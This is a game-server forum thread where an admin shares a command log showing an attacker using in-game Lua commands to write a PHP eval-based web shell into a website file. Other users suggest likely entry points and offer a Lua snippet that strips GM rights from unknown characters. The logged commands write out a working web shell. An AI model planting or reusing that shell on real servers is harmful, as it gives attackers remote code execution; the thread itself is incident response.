Jump to content
Sign in to follow this  
Followers 0
BorzZ

Hack

By BorzZ, in Questions & Help

Recommended Posts

BorzZ    0

BorzZ
Posted

hello guys i got big question which made me get crazy!

someone in somehow did hack my server and did use lua cmd IN GAME to upload a file inside my website to hack my server and make everyone at server a GM!

look at this : i found it on DoCommand ( Commands Log ) 

[03-24 02:57:25][ExecWork]Cha-Chibi+533: lua haxfilename = "C:\\Program Files (x86)\\Zend\\Apache2\\htdocs\\classes\\smarty\\internals\\core.smarty.php"
[03-24 02:57:32][ExecWork]Cha-Chibi+533: lua if(fileexists(haxfilename) ~= false) then haxfile = io.open(haxfilename,'a');end
[03-24 02:57:38][ExecWork]Cha-Chibi+533: lua haxfile:write("<?php $query = stripslashes($_POST[\'query\']);")
[03-24 02:57:43][ExecWork]Cha-Chibi+533: lua haxfile:write("eval($query); ;?> <form method=\"POST\" action=\"<?PHP echo stripslashes($_SERVER[\'PHP_SELF\']);?>")
[03-24 02:57:47][ExecWork]Cha-Chibi+533: lua haxfile:write("\" accept-charset=\"UTF-8\">")
[03-24 02:57:51][ExecWork]Cha-Chibi+533: lua haxfile:write(" <textarea name=\"query\" cols=\"48\" rows=\"8\" ></textarea>")
[03-24 02:57:55][ExecWork]Cha-Chibi+533: lua haxfile:write("<p><input type=\"submit\" value=\"Submit\"></p></form>")
[03-24 02:57:59][ExecWork]Cha-Chibi+533: lua haxfile:close()                            
 

Share this post

Link to post
Share on other sites

MonkeyCode    453

MonkeyCode
Posted (edited)

this is one of the oldest hacks in the book. Ideally, this isn't the actual problem.
First, conduct how the hacker was able to get a GM authorized account.
Some possibilities: web backdoor, sql injection, embedded lua script within the serverfile itself.

Now, a prevention (assuming you use v3ctor's GS), and you alone know who your GM's are.
if(GetGmLv(playerData) > 0)
    if(GetChaDefaultName(playerData) ~= 'yourName')
        SetGmLv(playerData, 0);

Ofcourse, not the brightest solution, but this would automatically prevent lua commands to be executed ingame from unauthorized guests.

Edited by xtc
  • Like 2

kong.png

a2.png

Share this post

Link to post
Share on other sites

BorzZ    0

BorzZ
Posted
4 hours ago, xtc said:

this is one of the oldest hacks in the book. Ideally, this isn't the actual problem.
First, conduct how the hacker was able to get a GM authorized account.
Some possibilities: web backdoor, sql injection, embedded lua script within the serverfile itself.

Now, a prevention (assuming you use v3ctor's GS), and you alone know who your GM's are.
if(GetGmLv(playerData) > 0)
    if(GetChaDefaultName(playerData) ~= 'yourName')
        SetGmLv(playerData, 0);

Ofcourse, not the brightest solution, but this would automatically prevent lua commands to be executed ingame from unauthorized guests.

Can you tell me ist possible to find out if there any bds on my serverfiles ? 

Share this post

Link to post
Share on other sites

V3ct0r    2,117

V3ct0r
Posted

@BorzZ You have to scan all .lua files. It is hard work, so you should take the files from trusted sources

  • Like 1

Some useful links / Полезные ссылки

 

My developments / Мои разработки

 

I do not provide any help in private messages and outside the forum. Use 'Questions & Help' section please. Thank you for understanding! 

Я не оказываю какую-либо помощь в личных сообщениях и вне форума. Пожалуйста, используйте раздел "Пиратия: Помощь". Благодарю за понимание!

 

Share this post

Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Restore formatting

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Sign in to follow this  
Followers 0
Go To Topic Listing
×
×
  • Create New...